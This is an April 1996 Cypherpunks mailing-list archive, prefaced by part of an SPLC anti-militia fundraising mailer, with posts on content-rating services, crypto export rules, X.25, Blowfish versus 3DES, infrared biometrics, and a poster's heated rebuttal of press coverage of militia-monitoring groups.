Secret Cells Formed

>From California to Florida, "Patriots" are forming cells of
five to ten men skilled in explosives, sniper fire, sabotage
and terrorism. These secret cells operate without a chain of
command to avoid compromising the larger movement. One cell
recently uncovered in Idaho is financed by a wealthy
businessman. These cells, like the one McVeigh is suspected of
forming, are difficult to monitor and can strike when least
expected.

____________________________________________________________

What You Can Do To Help Stop Domestic Terrorism

You can take a number of steps to fight against domestic
terrorists.

+ Contact your state attorney general's office

Find out if your state has anti-militia and anti-paramilitary
training statutes. If the answer is "Yes," insist that the
laws be enforced. If "No," urge the attorney general's office
to work for passage of such laws.

+ Support federal legislation to outlaw militia groups that
are not authorized by state law

These groups operate as a springboard for dangerous
antigovernment activity.

+ Learn about the "Patriot" movement and share your knowledge
with others

The "Patriot" movement thrives on secrecy and citizen apathy.

The *False Patriots* report offers the most complete way for
concerned individuals to learn the full story of the "Patriot"
movement. It was created by the Militia Task Force, a project
of the Southern Poverty Law Center, and is available to those
who support the Center's work with a tax-decutible gift of $15
or more.

The Militia Task Force is leading the fight to expose the
"Patriot" movement and protect those injured in hate crimes.
The Center's Militia Task Force and its Klanwatch Project
monitor "Patriot" groups, especially those with racist ties.
Computerized investigative files contain over 11,000 photos
and videos as well as data on 3,200 groups, 14,000 individuals
and over 61,000 incidents. A quarterly "Intelligence Report"
is provided free to law enforcement agencies and the media.

This work has not been done without costs. In 1983, the
Center's Montgomery, Alabama, offices were burned by the Klan.
Its lawyers have received serious death threats. Just this
past November, three members of the Oklahoma Constituional
Militia were arrested in a plot to bomb the Center's offices.

____________________________________________________________

                 Support the Center and its
                   Militia Task Force and
                  Recieve *False Patriots*

                     Militia Task Force
        A Project of the Southern Poverty Law Center
         400 Washington Avenue, Montgomery, AL 36104

Yes, send me a copy of the 72-page *False Patriots*. Enclosed
is my tax-deductible gist to help expose the "Patriot"
movement and protect innocent people from hate crimes and
injustice

[ ]$15   [ ]$25   [ ]$50   [ ]$100   [ ]Other $_____________

Name _______________________________________________________

Address ____________________________________________________

City ____________________________ State _____ Zip __________

____________________________________________________________

A copy of the latest official registration statement and
financial report filed by the Souther Poverty Law Center may
be obtained by contacting Office of Charities Registration,
162 Washington Avenue, Albany, NY 12231.

Y9604NYT





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 15 Apr 1996 09:11:02 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [Political Rant] Was: examples of mandatory content rating?
In-Reply-To: <Pine.SUN.3.91.960413211541.9295G-100000@polaris.mindport.net>
Message-ID: <199604142144.OAA04096@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Unicorn takes time off from his busy schedule of smearing and ridiculing
me with sniping pot shots to write up a more comprehensive attack:

>> I foresee that the "industry" of providing ratings is going to be
>> a very significant aspect of future cyberspace.
>
>I tend to disagree.  Ratings are generally consumed by parents and 
>otherwise custodial entities.  The largest and richest market anywhere 
>has always been the 18-25 range, or 18-30 depending on who you talk to.  

you seem to not address the more liberal concept of "rating" that I 
am using, which does give me an opportunity to elaborate.
 in my view, anyone who exercises judgement is in fact
applying a process of "rating". the results of that rating
may be "explicit" in the form of things like measurements, (MPAA
ratings being discussed) or they may be implicit, such as the
selection of content for a magazine by an editor. however,
at the root these are the same activities-- taking a subjective
human judgement, and creating some objective "product" or 
"conclusion" from these judgements. 

ratings abound in our society. we have SAT tests for students.
every test is a kind of a "rating" by a "trusted rating
agency". we have the Better Business Bureau. we have credit
ratings. we have "referral services". all of these someday
are going to be seen for what they are: services that measure
the "quality" or "value" of various other services or 
information pieces. as we move into an information society,
people will begin to understand the commonalities between
all these seemingly diverse areas. they will tend to become
more unified and diverse at the same time.

most people are applying the concept of ratings far too narrowly
in my view, like you do above. I tried to expand your horizons,
but you lept into the trap of seeing ratings only of value to
parents. ratings in general are extremely valuable to everyone
who lives on the planet. imagine some of the following ratings 
services:

1. quality of internet providers around the country
2.  lists of people who spam internet mailboxes
3. best hi tech companies to work for based on packages

etc. ad infinitum

all of these have audiences, and would be economically viable to
maintain in my view. we will let the market decide. but when
the future of our economy is "information", you are going to
see some very radical new industries emerge. ratings
are one of them.

>And like any ratings system, it relies on the raters subjective 
>judgement.  Not a very market stable or market wise system. 

false. subjective judgement is relied on all the time by everyone.
it is not perfect, but because it is not perfect does not mean
it is worthless. you are relying on the subjective judgements
of zillions of people by living on the planet, who made subjective
decisions like: how do I best build a house? how do I build a 
computer? how do I plan this city? these are all subjective
situations.

 Tell me who 
>would pay extra for a movie that had a rating on it. 

completely incorrect concept.  people pay a lot of money for 
TV guide, for movie rating books, the advertisers pay Siskel
and Ebert (a rating service), etc. (btw, it was Klaus who 
first gave the Siskel and Ebert example, and because he is
so sensitive to being properly credited for his visionary ideas, well
I am crediting him <g>)

 No reason to 
>bother.  People don't like the movie, they can leave. 

oh brother. surely you see how weak your argument is. they paid
$7 to leave at the beginning? and you think there is no market
for a movie rating service? such services already exist.

 Instead they pay 
>for the newspaper that has the review of the movies subject matter.

right. a rating service. you will see more and more in the future
as information is recognized to have value in our economy.

>  No 
>one much cares about the motion picture rating in any event.  Parents 
>perhaps, and children, to the extent that 'R' and 'NC-17' films are 
>mystified and thus interesting.  I can't even think of what the rating of 
>the last film I saw was.  I simply don't care.
>
you have gone off on a strange tangent that was not in any way justified
by what I wrote, although you have a pretty good argument against *something*,
I'm not sure what <g> -- I didn't claim that MPAA ratings were the
best example of a rating service. in fact it is a very primitive
kind of rating system in my view.

>> note that "good/bad"
>> is the most simplistic rating possible. even more superior rating
>> agencies might find "cool material".
>
>Like the "hot sites" on Netscape's home page, or Alta Vistas?  Or the 
>"site of the day" stuff?  Note that all this is free today.

false. they get paid by their advertisers to maintain that. just because
you don't pay doesn't mean that no money is involved. furthermore
there is a great example of an internet web site rating service called
"point communications top 5%"-- another economically viable venture.
these people do nothing but surf and rate sites, essentially, and
now they have a marketed book out on the subject. it's a rating service.

>  Again, they 
>all rely on the ratings judgement of the rater.  Given that most of these 
>services are funded by advertizing sales rather than user cost, I think 
>it's fairly clear that users wouldn't bother to pay for them.

that doesn't mean, as I repeat, that rating services will not increase
and thrive. there are many ways for an economy to run outside of direct
fees.

>> in fact in a sense, every
>> editor of every newspaper is a sort of "rating server". he culls,
>> filters, and selects information that the readers like.
>
>That's a far cry from rating.  That's simple exclusion.  There is no 
>discussion of the reasons and rationale for excluding, merely the 
>exclusion. 

no, frequently you will see editors write columns about what kind of
information they are excluding etc.  the whole concept of how much
space they dedicate to an article, the size of the headlines, the placement
of the articles, all are an "implicit" rating of the material. as I said,
some ratings are explicit, some are implicit. but the whole field
is going to become increasingly blurry in the future.

> This is the cypherpunks lite example.  Will there be a place 
>for content/subject based news review, yes.  But it will be much more 
>interactive than ratings made by a central authority. 

notice you seem to equate "ratings" with "central authority". PICS
is a good example of how this is a fallacious line of thinking. indeed
what I and Klaus have openly advocated is a distributed rating system
in which there are no "official rating agencies" other than those
that simply choose to be rating systems. you let the information
market decide.  PICS does support such a 
system, and is designed with that as a key design goal.

repeatedly in your message you try to extrapolate on the future
based on some very primitive and rudimentary systems in the present,
which I think is not going to give you a very realistic view. it
would be like the prediction made in popular mechanics, "computers
will some day become as small as a room".

your notes on copyright I don't really want to respond to, as I have
written essays here on my thoughts on the subject before that cover
it.

>There has been much talk lately about a move back to the centralized 
>computing model.

not by me. but note that the concepts of "centralized" vs. "distributed"
can become blurry in various situations, and I believe this blurring
will continue.

>Who is going to bother with centralized ratings when customized ratings 
>are a few keystrokes away.

nowhere in my article did I say that ratings would be centralized.
it is true they will be "centralized" in the sense that each agency
decides what ratings they have and how to store them etc.-- but
the agencies themselves are decentralized. their systems may in
fact also be decentralized (e.g. rely on many different reviewers).

  The basic premise that people will prefer to 
>have material selected for them rather than select it themselves is, in 
>my view, fatally flawed.

hmm, that's strange then that magazines and newspapers exist, or
mailing lists with moderators, etc.  maybe we don't  live on the
same planet or something.

>You really think central authority rating a la TRW is a "good thing"?  I 
>submit you've never had to deal with TRW.

imagine a rating service that rated the quality of companies. such a
company would be the consumer's complementary tool. the companies
rate their customers, and the customers rate their companies. indeed
a rating service designed for one audience (such as companies) is
going to be mostly worthless and perhaps even opposed by other
audiences (such as consumers). but once everyone has ratings that
they use, perhaps they will "live and let live".

>You are also ignoring the fact that if such an industry ever does 
>exist, there will be a free market of raters.  ...
> A centralized and 
>standardized ratings system is going to be an economic flop.

you seem to want to argue with me no matter what I say, so you read
all kinds of things into my essay I didn't write. I advise you to stick
to what I wrote if you are going to attribute things to me, although
your fiery passion against debunking the nonexistent is amusing and
I wouldn't want to squelch all future emanations of it.

a major point of the post I wrote was that ratings is a system that
involves a free market. nowhere did I argue for "a centralized and
standardized rating system" in the sense of one authority making
all the subjective decisions. what I *do* favor is a unified
*framework* wherein such decisions can be collected and traded
within, with PICS a very nice early attempt at this important
capability.


>> in the old system, censorship was accomplished by the government
>> putting chains on, or burning, "atoms". in the future, people will just
>> select whatever information they are interested in.
>
>In the future?  They do that now.  What do you think Alta Vista is?
>Alta Vista in its purest form, cataloging, is by no stretch of the 
>imagination a ratings system. 

no, I consider it a ratings system. the ratings are "implicit" vs.
"explicit". they are making subjective decisions about how to organize/
present the material etc similar to what an editor does, which again
I suggest is a "rater of information", although his judgements
are reflected implicitly, not explicitly, in his end product.

> It's also free.  So much a for massive 
>retail ratings industry.

again, I never said that individual consumers would pay for every
rating they consume. systems whereby advertisers effectively pay
for these ratings will be very useful as well. you seem to be 
"hot and bothered" by something I wrote, but I can't pinpoint exactly
what I said that got you so torqued up.

>Its interesting to me that you can be both so freedom of information 
>oriented, and central authority obsessed at the same time.

your idea that I am interested in a central authority as far
as "one unified rating agency" is totally incorrect and not 
supported by anything that I wrote in my post, and in fact I 
think outrightly contradicted by serveral statements in it.

again, what I do advocate is a unified technical standard by
which multiple rating agencies can all coexist. I am expressly
against coercion of consumers or retailers to follow particular rating
guides for any purposes. the entire system must be voluntary in
most aspects. 

however, an individual retailer should be free
to screen his merchandise or selection based on his own judgement,
which may or may not be based on ratings. if a large group
of retailers agree to ban various material based on their
voluntary decision to follow particular ratings, so be it.
the consumer is free to choose a different retailer that
better suits their needs. a consumer cannot demand a particular
kind of service however in my view if the retailer is not
interested in providing it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Apr 1996 08:51:15 +0800
To: Jeremey Barrett <jeremey@forequest.com>
Subject: Re: Is crypt(1) a prohibited export?
Message-ID: <199604142149.OAA28351@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 PM 4/13/96 -0700, you wrote:
>crypt() is a hash function, and hence is not subject to export restriction.
>(To my knowledge).
>> Is crypt(1) a prohibited export from the US? I thought it was. The
>> reason I ask is that it has come to my attention that HP ships that
>> overseas too, with HP-UX versions 9 and 10...

crypt(3) is a hash function, used for passwords and login, and is exportable.
crypt(1) is the rotor-based enigma-like encryption filter, and is not
exportable.
The Unix versions that support crypt(1) generally also have a -x option for
ed and vi to let you edit encrypted files.  Crypt Breaker's Workbench works
on it.

Actually, unless you specifically apply for permission, even rot13 isn't
exportable.
Unfortunately, this means it's illegal for me to make Rot13-Breaker's Workbench
available for ftp :-)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Apr 1996 09:12:57 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Open Systems, Closed Systems, & Killer Apps
Message-ID: <199604142149.OAA28361@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 AM 4/10/96 -0400, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Various correspondents have pointed out that X.25 is an "open system" in
>that it is not proprietary.  I knew that.  I was thinking more of
>hierarchical vs peer-to-peer.  I have been under the impression that
>TCP/IP connections are more peer-to-peer between different sorts of
>networks (or nodes) than X.25.  Isn't X.25 more of a standard for a
>single network?  Don't X.25 networks need someone more "in charge" than
>TCP/IP networks, or am I mixing up different layers on the OSI reference
>model?  

X.25 is an interface between a Data Terminal Equipment and a Data Communications
Equipment, rather than a whole-network format like IP and TCP.
X.25 networks often have random proprietary internals, and they're designed
for a world where there IS only one network, because after all, there's only
one Phone Company; the X.75 protocol lets X.25 networks talk to each other.
But if you look at the higher levels of the protocols, they're not really
that different than TCP applications - you've typically got a listener 
application waiting around for connections from client programs.
It feels a bit less peer-to-peer because usually the service you want
is the X.3/X.28/X.29 stuff that's X.25's equivalent to telnet,
so the server end is a MainFrame, and the client end is a terminal pad
that you've connected your 3270 or dumb terminal to.  But you can do other 
things as well, if your computer environment will support it.

Simon Spero wrote:
} you can call X.25 a lot of things, but proprietary is not one of them. 
} X.25 did not fail because it wasn't open; X.25 failed because it was crap

It's not dead yet, and you can't even say it's failed, given that it's still
in wide use in much of the world.  X.25 was design to work on networks with
really bad bit loss - we're talking modems on barbed wire here, or whatever
the French use instead of barbed wire, and in days when computers were _slow_.
Yes, it's bureaucratically designed, and parts of it genuinely are ugly,
and it does lots of work at Layer 2 that these days you'd do at a higher layer.
And, yes, it's a lousy environment to do full-duplex character echo over.
But it works ok for a large fraction of the world's data communications,
which are designed for less interactive environments.  It's fine for email.
It's fine for 3270 fill-in-the-blanks applications.  It's fine for pre-Web
online service applications like CompuServe.  It reeks badly
for client-server applications which do a dozen little handshakes per
transaction,
which are designed assuming they're on a LAN and fail badly when stretched
across an ocean, but you'll find they often do badly on frame relay as well.

Are the Internet and Frame Relay both better ways to do anything than X.25?
Yeah.
Would I want to do interactive work on it?  Of course not.  Would I like to do
another project getting vendors to modify their X.25 and CLNP to support a set
of seldom-used options that some security consultant once convinced one of my
customers they needed?  No way.  Was I susprised that not only does AT&T still
use X.25 in some of its older dialup networks, but that it's still very big
overseas?
Well, yeah :-)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "O.C.Winton WN1Z" <orrin@redshift.com>
Date: Mon, 15 Apr 1996 10:44:12 +0800
To: cypherpunks@toad.com
Subject: instructions for anon.penet.fi? please
Message-ID: <317172B2.2121@redshift.com>
MIME-Version: 1.0
Content-Type: text/plain


Wonder if someone here could pls tell me how to go about finding
out how to use the anonymous remail services @ anon.penet.fi.
On the list please.  Thank you.

orrin@redshift.com

http://www.redshift.com/~orrin



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 15 Apr 1996 09:14:21 +0800
To: Jerry Whiting <jwhiting@igc.apc.org>
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <199604140412.VAA24649@igc2.igc.apc.org>
Message-ID: <Pine.SUN.3.93.960414144321.29416B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Apr 1996, Jerry Whiting wrote:

> We're shooting for a May 1 release for Windows with the Mac and DOS 6
> weeks behind and VAX/Sun a month after that.  We're aiming for the
> stars: encryption, time/date stamps, signatures, message digests, etc.
> all based on Blowfish.  We're doing a core engine with APIs, a
> standardized file format, and extensability for other developers.  We're
> very committed to making the spec including the API and file format VERY
> PUBLIC.  Like I said, we're aiming high. 

This sounds like an interesting project.  However, I'm having trouble
understanding your goals.  Blowfish is a block cipher.  Why are you using
it to do anything but encryption?  I know there are cryptographic
constructions that allow you to do message digests with block ciphers, but
they are slow and not guaranteed to be as secure as the underlying block
ciphers.  I suggest that instead you use an established message digest 
algorithm such as SHA.  How are you planning to do timestamps and
signatures?  I presume you'll need some other algorithms besides
Blowfish.  Also, will the software be freeware, shareware, or commercial?

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Mon, 15 Apr 1996 06:23:32 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Consolidation of threads ...
Message-ID: <v01540b0cad96f6491958@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


OK, I have a proposal that consolidates two threads that have been
discussed recently.  How about proposing legislation that mandates that a
byte is now 9 bits instead of 8.  This would allow the ninth bit to be the
decent/indecent bit, thereby solving all of our problems.

        Clay


---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 15 Apr 1996 07:40:29 +0800
To: cypherpunks@toad.com
Subject: Infrared photography
Message-ID: <9604142026.AA16940@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>No, Clay, I did not say that the flesh RADIATED near IR. (it does, but only 
>a very tiny amount.)  The identification system I describe would probably 
>use 940 nm IRLEDs to illuminate the face, and a silicon CCD detector to pick 
>up the images.  Or it would use ambient near-IR, perhaps from the sun or a 
>tungsten filament or fluorescent lighting, along with an IR filter to ensure 
>that the CCD camera picked up only the IR bands of interest.  It would be 
>easy to check out the results:  Put such an IR-passing filter in front of a 
>CCD-based camcorder, and take a picture of somebody.
>
>Incidentally, this simplicity shows the flaw in using this kind of system as 
>an identifier:  Since people's faces are usually visible, and can be 
>photographed in the near-IR surreptitiously, it isn't clear how to prevent 
>faking a face which appears to have the same IR signature and pattern.

I remember in a booklet from Kodak on their Ektachrome IR film, there was a
picture
of a forearm where all the veins were made clearly visible.  This film is near 
infrared (if I remember, the red color on the film corresponds to around
1100 nm).

Veins and artery identification might be possible, maybe, since fingerprint
identification is possible.  A friend of mine developped a quite functionnal 
algorithm doing just that in the late eighties.  OTOH, the blood vessels
patterns are probably much more constant, from individual to individual,
than fingerprints.  Just correct me if I am wrong.

JFA


 PGP 2048 bits key at:     http://w3.citenet.net/users/jf_avon
 ID:C58ADD0D  52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 15 Apr 1996 10:02:13 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <199604141422.KAA05302@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.93.960414145921.29416C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Apr 1996, Perry E. Metzger wrote:

> At least partially broken, yes. I've forgotten the details. I believe
> they were discussed at Eurocrypt. It may be that with the full number
> of rounds that no one yet has a cryptanalysis but I don't recall and
> it doesn't particularly matter from my perspective.

It doesn't make much sense to condemn an iterated cipher based on attacks
on reduced-round versions.  Any such cipher becomes weak if you use
sufficiently few rounds.  Conversely, many broken ciphers become secure if
you use sufficiently many rounds (in which case they also become too slow
to be useful).  I don't think there are currently any public attacks that
seriously affect the security of Blowfish.

On the other hand, if you ask cryptographers what they would use if they
were not concerned with efficiency, I think most of them would say triple
DES.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 15 Apr 1996 10:03:46 +0800
To: Jerry Whiting <cypherpunks@toad.com
Subject: Re: carrick, Blowfish & the NSA
Message-ID: <v02120d4aad9726d82937@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:12 4/13/96, Jerry Whiting wrote:

>Our marketing tag ("Encryption software so good, the Feds won't let us
>export it.") may well become a self-fulfilling prophecy.  But that's OK
>because having others adopt carrick is our real goal.  Building up a
>strong U.S. user base is OK while we wrestle with the NSA over how big a
>key length we can export.  Their initial response was that 40-bit keys
>were specific to RC2 and RC4 and that Blowfish was another kettle of fish
>(bad pun intended).
>
>Either way we're going to publish an extensive FAQ on carrick that should
>allow someone to not only work with carick but perhaps clone our efforts.
>IANAL but my understanding is that publishing such a document, with or
>without source code, and making it publicly available to non-U.S. citizens
>is perfectly legal.

I hope you are still going to publish source for US citicens?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 15 Apr 1996 07:00:23 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <Pine.LNX.3.92.960414121820.358A-100000@gak>
Message-ID: <199604141933.PAA05457@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Mark M." writes:
> > I was unaware that PGPPhone used Blowfish, but if it does that was a
> > stupid idea in the first place.
> 
> Blowfish is unpatented, free for commercial use, and very fast so I don't see
> how the use of Blowfish could be considered stupid.  IDEA and triple-DES may
> be more secure, but I think that they are too slow for voice communication.

Huh?

Voice communication is typically under 20kbps. Using Phil Karn's
latest code, a pentium can do about 10Mbps for single DES, and
presumably about 3Mbps for 3DES. Thats orders of magnitude larger than
you need. 3DES is unencumbered.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kris Steven Shannon <kss01@uow.edu.au>
Date: Sun, 14 Apr 1996 17:22:23 +0800
To: cypherpunks@toad.com
Subject: cyherpunks archive
Message-ID: <199604140535.PAA18022@wumpus.its.uow.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


I can't get access to the cypherpunks archive at berkeley


Is there a mirror site anywhere?

(I don't have FTP access but have been using ftpmail@doc.ic.ac.uk)

Any suggestions very welcome!

Thanx.

-- 
Kris Shannon <kss01@cs.uow.edu.au>
1st year Bachelor of Computer Science.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <apb@iafrica.com>
Date: Mon, 15 Apr 1996 00:36:40 +0800
To: Steve Reid <steve@edmweb.com>
Subject: [NOISE] Re: unsubscrive - Let's make a special list for these people!
In-Reply-To: <Pine.BSF.3.91.960409210739.10189A-100000@kirk.edmweb.com>
Message-ID: <Pine.NEB.3.91.960414155245.20353J-100000@apb.iafrica.com>
MIME-Version: 1.0
Content-Type: text/plain


> I have an idea....
> 
> Create a special "unsubscrive mailing list".

It used to exist a few years ago.  It was called the "Clueless Users
Mailing List".  The idea was that somebody annoyed by a clueless user's
sending subscribe or unsubscribe messages to a list would subscribe the
clueless user to the clueless users' mailing list, where the clueless
users would all get each other's "help" and "get me out" and "unsubscrive"
messages, but would not get any help from clueful folk, until they figured
out how to use the appropriate "-request" address. 

--apb (Alan Barrett)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 15 Apr 1996 06:52:32 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <Pine.3.89.9604141322.A21250-0100000@tesla.cc.uottawa.ca>
Message-ID: <199604142002.QAA05493@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



s1113645@tesla.cc.uottawa.ca writes:
> If it's the one that's in applied crypto 2 (p.339) and ddj, then it's only
> partial crack on a low number of rounds (according to AC2). Schneier still
> thought it was secure at the time of the publishing of AC2, but then he
> may be biased. (and since this is crypto why not be paranoid, eh?)

Its only the partial crack, from what I know. It still makes me
nervous, and besides there are very good cryptosystems like 3DES
that are available and well studied.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 15 Apr 1996 09:16:53 +0800
To: olbon@dynetics.com (Clay Olbon II)
Subject: Re: [NOISE] Consolidation of threads ...
In-Reply-To: <v01540b0cad96f6491958@[193.239.225.200]>
Message-ID: <199604142009.QAA05517@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Clay Olbon II writes:
> OK, I have a proposal that consolidates two threads that have been
> discussed recently.  How about proposing legislation that mandates that a
> byte is now 9 bits instead of 8.  This would allow the ninth bit to be the
> decent/indecent bit, thereby solving all of our problems.

Ah, the naughty bits.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 15 Apr 1996 07:50:55 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Consolidation of threads ...
In-Reply-To: <v01540b0cad96f6491958@[193.239.225.200]>
Message-ID: <wa7DmD88w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


olbon@dynetics.com (Clay Olbon II) writes:

> OK, I have a proposal that consolidates two threads that have been
> discussed recently.  How about proposing legislation that mandates that a
> byte is now 9 bits instead of 8.  This would allow the ninth bit to be the
> decent/indecent bit, thereby solving all of our problems.

Hmm. In the days of COCOM (a relative of ITAR) there was a doctrine that
individual pieces of a mosaic may be unclassified, yet together they may
form a whole that needs to be export-controlled.

Likewise 8-bit values 0x46,0x55,0x43,0x4B may not be obscene individually,
but together they comprise a vile, CDA-prohibited obscenity.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Mon, 15 Apr 1996 02:52:54 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [Political Rant] Was: examples of mandatory content rating?
In-Reply-To: <Pine.SUN.3.91.960413211541.9295G-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9604141600.A8552-0100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 13 Apr 1996, Black Unicorn wrote:


> And like any ratings system, it relies on the raters subjective 
> judgement.  Not a very market stable or market wise system.  Tell me who 

	Since somebody else brought up SurfWatch, remember that 
	it was SurfWatch that declared whitehouse.org to be 
	off-limits for obscene content.  A mistake on their
	part --- or at least that is their claim.  << This
	was just before CDA passed, btw.   >> << I personally
	thought it was a great way to demonstrate the absurdity 
	of CDA.  >>

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Mon, 15 Apr 1996 08:04:41 +0800
To: cypherpunks@toad.com
Subject: Re: Enemies R Us [Political Rant]
Message-ID: <960414163840_271703650@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>These are organized groups of militias, white supremacists,
>neo-Nazis- skinheads, survivalists and constitutionalists who
>are connected to each other with increasing frequency by the
>Internet, fax machines and a shared belief in Christian
>Identity, a renegade religious concept that. proclaims whites
>to be God's chosen people, Jews to be descendants of Satan and
>blacks to be subhuman.

These views are shared by only a small minority of the patriot movement.
 This paragraph is pure propaganda.  There are some of these people in the
patriot community, but their percentages are not much higher than in the
general population.

>At the same time, however, as Federal agencies proceed with
>traditional means of intelligence gathering (as in the
>Unabomber case), and Congress ponders a new anti-terrorism
>bill (stalled by the gun lobby and civil libertarians),
>efforts to fight domestic terrorism are being supplemented
>more than ever by private human rights organizations that
>track the fringe right with their own networks. They willingly
>share information with law enforcement agencies, branches of
>the military and reporters.

If Federal LEO's are getting so much help from volunteer snitches, why do we
need the anti-terrorism bull? :)

>Federal law enforcement agencies, which were heavily
>criticized for their actions in fatal controntations in Ruby
>Ridge, Idaho, and Waco, Tex., appear to be trying a new, more
>patient approach in waiting for a peaceful solution to the
>current standoff with the anti-government group called the
>Freemen in eastern Montana. They have been criticized this
>time, largely by neighbors of the Freeman and local officials,
>for waiting so long to get involved, and for waiting at all.

Don't wait.  Act precipitously.  Burn all the [insert disliked
individuals/groups here].  Oh, wait.  Isn't that what Hitler did?

>Most of the human rights organizations were actively
>campaigning against racism and anti-Semitism long before the
>Oklahoma City bombing on April 19, 1995 and the arrest of two
>suspects with links to militia groups. And with many of the
>right-wing groups now hiding racist views beyond a more
>acceptable veneer of anti-government oratory, the human rights
>groups say the need to collect information has become that
>much more critical.

There is NO clearly established connection between McVeigh and ANY militia
group.  This notion is more government propaganda.

>At least two of them -- the Southern Poverty Law Center in
>Montgomery, Ala., and the Simon Wiesenthal Center in Los
>Angeles -- use undercover operatives. Both organizations had
>spies attend a convention last weekend in Lake Tahoe that
>attracted hundreds of Christian Identity followers to hear a
>speech by Randy Weaver, the white separatist whose wife and
>son were killed three years ago in a siege by Federal agents
>in Ruby Ridge.
>
>The Southern Poverty Law Center has computer files of more
>than 12,000 people identified as members of a far-right group.
>The Wiesenthal Center operates an extensive electronic
>tracking station, where researchers monitor television, cable
>and radio shows all over the world for racist and anti-Semitic
>content.

I find it ironic that the SPLC is run by far-left radicals of the type who
did a lot of bitching in the 60's when their ox was being gored.  (Does
anyone remember COINTELPRO?)

The Wiesenthal center is actively supporting legislation (the anti-terror
bill, various gun control bills, etc.) that would give our gov't many of the
same powers Hitler had, which he eventually used against the Jews.  Those who
refuse to learn from history will be condemned to repeat it.
